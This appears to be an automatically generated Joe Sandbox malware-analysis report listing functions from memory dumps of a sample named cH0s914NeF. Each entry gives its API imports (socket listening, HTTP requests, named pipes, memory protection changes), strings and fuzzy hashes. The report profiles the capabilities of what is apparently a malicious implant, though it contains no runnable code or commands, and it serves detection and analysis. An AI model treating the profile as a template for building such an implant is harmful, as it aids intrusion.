Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: ErrorLast$CountNamedPipeTick$CreateDisconnectFileHandleSleepStateWait
String ID: C:\Windows\system32\wininet.dll
API String ID: 34948862-2281562036
Opcode ID: 1fbeea9be532b9f33a7578d86157401c58637eb984225940b498093461a2244d
Instruction ID: 20a34bb6fe9b8eceb21b615251501f08532142ec65341df03748ddf0b9bd7ae3
Opcode Fuzzy Hash: 1fbeea9be532b9f33a7578d86157401c58637eb984225940b498093461a2244d
Instruction Fuzzy Hash: 4041A93A700B0086EB00DB61E89476D33BAF789BA4F554726DEAA57BA4CF38C545C381

Uniqueness

Uniqueness Score: -1.00%

Function 03A75268 Relevance: 22.7, APIs: 15, Instructions: 195networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

htonl.WS2_32 ref: 03A752C5
select.WS2_32 ref: 03A75333
__WSAFDIsSet.WS2_32 ref: 03A7534B
accept.WS2_32 ref: 03A75368
ioctlsocket.WS2_32 ref: 03A75380
__WSAFDIsSet.WS2_32 ref: 03A75423
accept.WS2_32 ref: 03A75439

Part of subcall function 03A74170: ioctlsocket.WS2_32 ref: 03A74192

__WSAFDIsSet.WS2_32 ref: 03A754BB
__WSAFDIsSet.WS2_32 ref: 03A754D3
closesocket.WS2_32 ref: 03A75595

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: acceptioctlsocket$closesockethtonlselect
String ID:
API String ID: 2003300010-0
Opcode ID: 7628e35ad2332fee6b739d1ce5eb7cb20470cee2d2913517aafaa3cc703533d7
Instruction ID: 8949c4366b46049ca6384652bb47f8fb081b72d7cffde188c187df3339bbe298
Opcode Fuzzy Hash: 7628e35ad2332fee6b739d1ce5eb7cb20470cee2d2913517aafaa3cc703533d7
Instruction Fuzzy Hash: 26919F72B10B919ADB24DF61EA807AD73B5F789798F000126DB8D4BB58DF38D264CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0040C0C0 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 300memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,?,?,004D0420,004D0428,004CF690,00007FF8C6F6ADA0,?,?,?,00000001,0040127C), ref: 0040C274
VirtualProtect.KERNEL32(?,?,?,?,004D0420,004D0428,004CF690,00007FF8C6F6ADA0,?,?,?,00000001,0040127C), ref: 0040C296

Strings

Unknown pseudo relocation bit size %d., xrefs: 0040C34A
Unknown pseudo relocation protocol version %d., xrefs: 0040C3AA
VirtualQuery failed for %d bytes at address %p, xrefs: 0040C09A, 0040C393

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: Virtual$ProtectQuery
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$ VirtualQuery failed for %d bytes at address %p
API String ID: 1027372294-974437099
Opcode ID: 0966e8790b6b79a9b19af883027cb0d495c1e8bcec7e100a44b2f78d25cd37af
Instruction ID: c50b13ad85c0bcc741a0ad4ac8069c6965599476c8e9f31bc21b9ccd9202c0d7
Opcode Fuzzy Hash: 0966e8790b6b79a9b19af883027cb0d495c1e8bcec7e100a44b2f78d25cd37af
Instruction Fuzzy Hash: 12A1E471B00500C6EB149BB6D9D036A2352B7457A8F55823BDE09A77E9DB3DC886C34D

Uniqueness

Uniqueness Score: -1.00%

Function 03A7A328 Relevance: 19.7, APIs: 13, Instructions: 238stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

_time64.LIBCMT ref: 03A7A372
malloc.LIBCMT ref: 03A7A39B
strtok.LIBCMT ref: 03A7A3D7
strtok.LIBCMT ref: 03A7A405
_time64.LIBCMT ref: 03A7A413
malloc.LIBCMT ref: 03A7A5BF
strtok.LIBCMT ref: 03A7A612
strtok.LIBCMT ref: 03A7A694

Part of subcall function 03A7F670: _getptd.LIBCMT ref: 03A7F68F

free.LIBCMT ref: 03A7A6A5

Part of subcall function 03A7D188: HeapFree.KERNEL32 ref: 03A7D19E
Part of subcall function 03A7D188: _errno.LIBCMT ref: 03A7D1A8
Part of subcall function 03A7D188: GetLastError.KERNEL32 ref: 03A7D1B0

malloc.LIBCMT ref: 03A7A6BD
strtok.LIBCMT ref: 03A7A6EF

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: strtok$malloc$_time64$ErrorFreeHeapLast_errno_getptdfree
String ID:
API String ID: 620445413-0
Opcode ID: d25b6128ed1f2a7143d718cd71c0dc24c777b6b99499086e71dd0509d51768d1
Instruction ID: 821bdc924aee426e6aba8f6aed1889ec6ac910df42c61d2405f99ebd4bfdeaf3
Opcode Fuzzy Hash: d25b6128ed1f2a7143d718cd71c0dc24c777b6b99499086e71dd0509d51768d1
Instruction Fuzzy Hash: 92A191B6711B849AEB26DF15FD8432D77A9F7067A0F04821AC9A60B7A4CB3CC251C712

Uniqueness

Uniqueness Score: -1.00%

Function 03A6E8D8 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 130networksleepCOMMONLIBRARYCODE

Download Yara Rule

APIs

_snprintf.LIBCMT ref: 03A6E975

Part of subcall function 03A7D57C: _errno.LIBCMT ref: 03A7D5B3
Part of subcall function 03A7D57C: _invalid_parameter_noinfo.LIBCMT ref: 03A7D5BE

_snprintf.LIBCMT ref: 03A6E991
_snprintf.LIBCMT ref: 03A6EA07
_snprintf.LIBCMT ref: 03A6EA1E

Part of subcall function 03A7D57C: _flsbuf.LIBCMT ref: 03A7D61D

HttpOpenRequestA.WININET ref: 03A6EA6A
HttpSendRequestA.WININET ref: 03A6EA9D
InternetCloseHandle.WININET ref: 03A6EAB2
Sleep.KERNEL32 ref: 03A6EABD
InternetCloseHandle.WININET ref: 03A6EAD0

Strings

*/*, xrefs: 03A6E8FE
%s%s, xrefs: 03A6EA13

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _snprintf$CloseHandleHttpInternetRequest$OpenSendSleep_errno_flsbuf_invalid_parameter_noinfo
String ID: %s%s$*/*
API String ID: 3364845851-856325523
Opcode ID: 4d3adaf88e9e90db0637c378f7c191c0bc30314f5d8357b9e67139d4a27a59b8
Instruction ID: c42dd244bb107bf8946f74066fe2b602a1d4527873841c42974ee44235d40be3
Opcode Fuzzy Hash: 4d3adaf88e9e90db0637c378f7c191c0bc30314f5d8357b9e67139d4a27a59b8
Instruction Fuzzy Hash: 6251FE7A700B808AEB00DF65EE8479973B5F799798F440227CA9E57764DF38C209CB02

Uniqueness

Uniqueness Score: -1.00%

Function 03A7DEAC Relevance: 18.1, APIs: 12, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32 ref: 03A7DEBD
free.LIBCMT ref: 03A7DEDA

Part of subcall function 03A7D188: HeapFree.KERNEL32 ref: 03A7D19E
Part of subcall function 03A7D188: _errno.LIBCMT ref: 03A7D1A8
Part of subcall function 03A7D188: GetLastError.KERNEL32 ref: 03A7D1B0

free.LIBCMT ref: 03A7DEEF
free.LIBCMT ref: 03A7DF10
free.LIBCMT ref: 03A7DF25
free.LIBCMT ref: 03A7DF39
free.LIBCMT ref: 03A7DF45
free.LIBCMT ref: 03A7DF70
EncodePointer.KERNEL32 ref: 03A7DF78
free.LIBCMT ref: 03A7DF91
free.LIBCMT ref: 03A7DFAA
free.LIBCMT ref: 03A7DFDB

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
String ID:
API String ID: 4099253644-0
Opcode ID: 414a355009f71752a80ca6a1a86f772915b575b7b474327a6fec3fd0861578bf
Instruction ID: f8db699ba8d2bf7b3cb3b1d74414bb386c1fd945dc45f97bb3c81db56e2471f5
Opcode Fuzzy Hash: 414a355009f71752a80ca6a1a86f772915b575b7b474327a6fec3fd0861578bf
Instruction Fuzzy Hash: 52313E26711F4495FE16DF11FDE0368B368AF96BA4F5C022AC99A5AB60CF2CC245C313

Uniqueness

Uniqueness Score: -1.00%

Function 03A7DD50 Relevance: 18.1, APIs: 12, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 03A7DD76

Part of subcall function 03A7FBCC: _getptd_noexit.LIBCMT ref: 03A7FBD0

_invalid_parameter_noinfo.LIBCMT ref: 03A7DD82
__crtIsPackagedApp.LIBCMT ref: 03A7DD93
AreFileApisANSI.KERNEL32 ref: 03A7DDA2
MultiByteToWideChar.KERNEL32 ref: 03A7DDC8
GetLastError.KERNEL32 ref: 03A7DDD5
_dosmaperr.LIBCMT ref: 03A7DDDD

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: ApisByteCharErrorFileLastMultiPackagedWide__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 1138158220-0
Opcode ID: 45c80a8bb1a54d9da36eca88e3e5dd067c6ff5e0ef366819f7a7bb07a5a81634
Instruction ID: 48426535fd510d23b73d9b622c34a9ac50263b0bf9bb4d72d0a7ccabce3aa974
Opcode Fuzzy Hash: 45c80a8bb1a54d9da36eca88e3e5dd067c6ff5e0ef366819f7a7bb07a5a81634
Instruction Fuzzy Hash: 0C21A776301B4086EB15EF75DD9432977A5BFC9FA4F08462A9A9547795EF3CC100C701

Uniqueness

Uniqueness Score: -1.00%

Function 03A75990 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 03A759BE
select.WS2_32 ref: 03A75A15
__WSAFDIsSet.WS2_32 ref: 03A75A24
__WSAFDIsSet.WS2_32 ref: 03A75A3C
GetTickCount.KERNEL32 ref: 03A75A45
gethostbyname.WS2_32 ref: 03A75A58
htons.WS2_32 ref: 03A75A70
inet_addr.WS2_32 ref: 03A75A82
sendto.WS2_32 ref: 03A75AAB

Strings

d, xrefs: 03A759CF

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: CountTick$gethostbynamehtonsinet_addrselectsendto
String ID: d
API String ID: 1257931466-2564639436
Opcode ID: a246aa495eb1010205a87a75c0c1794da7582316548824e43cfe3d206ef98d68
Instruction ID: e4971725721e970002eae68ac51b2995b3a3c52fe14c4e04a2bc8cf52ac23154
Opcode Fuzzy Hash: a246aa495eb1010205a87a75c0c1794da7582316548824e43cfe3d206ef98d68
Instruction Fuzzy Hash: 5C316B33215B8096DB65CF21E88479A77A8F788B88F444127EF8D47B28DF78C655CB80

Uniqueness

Uniqueness Score: -1.00%

Function 03684123 Relevance: 16.6, APIs: 11, Instructions: 108COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 03684155

Part of subcall function 0367F013: _getptd_noexit.LIBCMT ref: 0367F017

__doserrno.LIBCMT ref: 0368414C

Part of subcall function 0367EFA3: _getptd_noexit.LIBCMT ref: 0367EFA7

__doserrno.LIBCMT ref: 036841B2
_errno.LIBCMT ref: 036841B9
_invalid_parameter_noinfo.LIBCMT ref: 0368421D

Memory Dump Source

Source File: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3660000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
String ID:
API String ID: 388111225-0
Opcode ID: f1e83107c3560ebd634bf603a2dc03616e82e6e5f746a5e0c4714b1d3544e5b9
Instruction ID: c08503dcd781432578fe9895a691ee3df6de97417c785853ff904c116d8f28c0
Opcode Fuzzy Hash: f1e83107c3560ebd634bf603a2dc03616e82e6e5f746a5e0c4714b1d3544e5b9
Instruction Fuzzy Hash: CE31387061C7054ED32AFFA9D89123D37D0EB4A320F45039DD4268F3A1DE7598024799

Uniqueness

Uniqueness Score: -1.00%

Function 0040D3E0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 129COMMON

Download Yara Rule

APIs

RtlUnwindEx.KERNEL32 ref: 0040D492
abort.MSVCRT ref: 0040D498
abort.MSVCRT ref: 0040D4D3

Strings

CCG!, xrefs: 0040D405
CCG!, xrefs: 0040D5C9
CCG", xrefs: 0040D411
CCG , xrefs: 0040D445

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: abort$Unwind
String ID: CCG $CCG!$CCG!$CCG"
API String ID: 1472537648-3707373406
Opcode ID: 285e6e26f4e63809887e6cf8900ebc74d62627e1ae12c4dd0e8917493e87fee6
Instruction ID: e497a712ed94c3dda92f368b39dbfb146ca0a468b45a7ca1789415b2f4116d79
Opcode Fuzzy Hash: 285e6e26f4e63809887e6cf8900ebc74d62627e1ae12c4dd0e8917493e87fee6
Instruction Fuzzy Hash: 0E513976604B4092D7208F95F88039A7375F389B98F64412AEF8E53BA8CF39D9A5C744

Uniqueness

Uniqueness Score: -1.00%

Function 0040C650 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 0040C6AD
signal.MSVCRT ref: 0040C722
signal.MSVCRT ref: 0040C77E
signal.MSVCRT ref: 0040C7AB
signal.MSVCRT ref: 0040C7C4
signal.MSVCRT ref: 0040C7FA

Strings

CCG , xrefs: 0040C665

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263277126.00000000004D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263290459.00000000004D6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cH0s914NeF.jbxd

Similarity

API ID: signal
String ID: CCG
API String ID: 1946981877-1584390748
Opcode ID: 054a7c087f329d0291a141d2fa82ee0712f6c4c0d000cdc57e6b6c066f914918
Instruction ID: e03453994b6c8efa25ac7f1daf6b436818327edbb8990f3feb161cf7dffc2b89
Opcode Fuzzy Hash: 054a7c087f329d0291a141d2fa82ee0712f6c4c0d000cdc57e6b6c066f914918
Instruction Fuzzy Hash: 23312F61700401C6EE79237A44D537A10029B8A338F289B3BDA2AD73E2DF7D8CD5865E

Uniqueness

Uniqueness Score: -1.00%

Function 03A75884 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 57networksleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 03A758A4
select.WS2_32 ref: 03A7590A
__WSAFDIsSet.WS2_32 ref: 03A75919
__WSAFDIsSet.WS2_32 ref: 03A7592E
send.WS2_32 ref: 03A75944
WSAGetLastError.WS2_32 ref: 03A7594F
Sleep.KERNEL32 ref: 03A75961
GetTickCount.KERNEL32 ref: 03A75967

Strings

d, xrefs: 03A758B2

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: CountTick$ErrorLastSleepselectsend
String ID: d
API String ID: 2152284305-2564639436
Opcode ID: 5b27ba0d8d607714712b298a6346cf3fa52a79f11e24ee9ada0824c07ae7a3d6
Instruction ID: f079fedd8103f8e2b524134b297534e4896c0ed338f7d2ad3ea40c8a32f02739
Opcode Fuzzy Hash: 5b27ba0d8d607714712b298a6346cf3fa52a79f11e24ee9ada0824c07ae7a3d6
Instruction Fuzzy Hash: 26216A72618B8097E7A0CF21F88878E7369F789B94F444126DBDD47A68DF78C558CB40

Uniqueness

Uniqueness Score: -1.00%

Function 03684F0F Relevance: 15.1, APIs: 10, Instructions: 93COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 03684F3A

Part of subcall function 0367F013: _getptd_noexit.LIBCMT ref: 0367F017

__doserrno.LIBCMT ref: 03684F32

Part of subcall function 0367EFA3: _getptd_noexit.LIBCMT ref: 0367EFA7

__lock_fhandle.LIBCMT ref: 03684F7E
_lseeki64_nolock.LIBCMT ref: 03684F97
_unlock_fhandle.LIBCMT ref: 03684FBA

Memory Dump Source

Source File: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3660000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock_unlock_fhandle
String ID:
API String ID: 2644381645-0
Opcode ID: 3dd1f773b3794dac3aa2364f63410e61f96c4d43ad1712998e2299525dae883a
Instruction ID: b771e832744a5d74f1b3c25310ba0dd0e9664bed2fd810fd6da16a3e0d806a1c
Opcode Fuzzy Hash: 3dd1f773b3794dac3aa2364f63410e61f96c4d43ad1712998e2299525dae883a
Instruction Fuzzy Hash: 5C21F8316187054EE31AFB6DE85177D72D0EBCA325F55079DD016CF2D1DFA4580282AA

Uniqueness

Uniqueness Score: -1.00%

Function 03A6F740 Relevance: 15.1, APIs: 10, Instructions: 91sleepfilepipeCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 03A6F761
GetLastError.KERNEL32 ref: 03A6F7BB
GetTickCount.KERNEL32 ref: 03A6F7C6
Sleep.KERNEL32 ref: 03A6F7D6
GetLastError.KERNEL32 ref: 03A6F7E3
WriteFile.KERNEL32 ref: 03A6F816
WriteFile.KERNEL32 ref: 03A6F845
FlushFileBuffers.KERNEL32 ref: 03A6F85D
DisconnectNamedPipe.KERNEL32 ref: 03A6F867
Sleep.KERNEL32 ref: 03A6F87B

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: File$CountErrorLastSleepTickWrite$BuffersDisconnectFlushNamedPipe
String ID:
API String ID: 3101085627-0
Opcode ID: 14ddf7d56459dce092d8b4c05f865c520464f36babfb135bd28acd5bcd2fd201
Instruction ID: 474667d85b4020969aab65722974c9279e36c5dabbbbc99fcbef8b6553a67a55
Opcode Fuzzy Hash: 14ddf7d56459dce092d8b4c05f865c520464f36babfb135bd28acd5bcd2fd201
Instruction Fuzzy Hash: 8B31A036B00A459AE710DFB6E88439D73B5F749B88F410127DE4AABA28DF38C609C341

Uniqueness

Uniqueness Score: -1.00%

Function 03684D97 Relevance: 15.1, APIs: 10, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 03684DC2

Part of subcall function 0367F013: _getptd_noexit.LIBCMT ref: 0367F017

__doserrno.LIBCMT ref: 03684DBA

Part of subcall function 0367EFA3: _getptd_noexit.LIBCMT ref: 0367EFA7

__lock_fhandle.LIBCMT ref: 03684E06
_lseek_nolock.LIBCMT ref: 03684E1F
_unlock_fhandle.LIBCMT ref: 03684E40

Memory Dump Source

Source File: 00000000.00000002.3263445653.0000000003660000.00000040.00001000.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3660000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock_unlock_fhandle
String ID:
API String ID: 1078912150-0
Opcode ID: a44390f2c37dd677b3233f6d87f92801b3f25a181347d6d3130cc20f15b56632
Instruction ID: 03e9da5dceff4315225da2879a19c70ed041eb6a61d8c3f76540826f198876c5
Opcode Fuzzy Hash: a44390f2c37dd677b3233f6d87f92801b3f25a181347d6d3130cc20f15b56632
Instruction Fuzzy Hash: 0F214631A0C7014FE32AFB6DD89573D7790EF8A334F19035DD1568F2A1DFA8580282AA

Uniqueness

Uniqueness Score: -1.00%

Function 03A84CDC Relevance: 15.1, APIs: 10, Instructions: 81COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 03A84D0E

Part of subcall function 03A7FBCC: _getptd_noexit.LIBCMT ref: 03A7FBD0

__doserrno.LIBCMT ref: 03A84D05

Part of subcall function 03A7FB5C: _getptd_noexit.LIBCMT ref: 03A7FB60

__doserrno.LIBCMT ref: 03A84D6B
_errno.LIBCMT ref: 03A84D72
_invalid_parameter_noinfo.LIBCMT ref: 03A84DD6

Memory Dump Source

Source File: 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A60000, based on PE: true

Associated: 00000000.00000002.3263573614.0000000003AA5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AAC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3263573614.0000000003AB0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a60000_cH0s914NeF.jbxd

Yara matches

Similarity

API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
String ID:
API String ID: 388111225-0
Opcode ID: 9f8bd50f574e5b1fba15d47533313b02c9ba4f688673664e799b398f3f09af9d
Instruction ID: 4377e98c1570f839b3310503b4de26129549f4337508cacc68e2c780d87b2df5
Opcode Fuzzy Hash: 9f8bd50f574e5b1fba15d47533313b02c9ba4f688673664e799b398f3f09af9d
Instruction Fuzzy Hash: 962100763007828EC306FF769D9032E3A61AB84BA8F4A572BDA254B791CB7CC541C720

Uniqueness

Uniqueness Score: -1.00%

Function 0040BEF0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 139memoryCOMMON

Download Yara Rule

APIs

__iob_func.MSVCRT ref: 0040BF37
VirtualQuery.KERNEL32 ref: 0040C014
VirtualProtect.KERNEL32 ref: 0040C04D

Strings

Mingw-w64 runtime failure:, xrefs: 0040BF26
VirtualProtect failed with code 0x%x, xrefs: 0040C085
Address %p has no image-section, xrefs: 0040BF67, 0040C0B0
VirtualQuery failed for %d bytes at address %p, xrefs: 0040C09A

Memory Dump Source

Source File: 00000000.00000002.3263181233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3263168901.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263228322.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263243393.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3263263823.00000000004D1000.00000004.00000001.01000000.00000003.sdmpDownload File
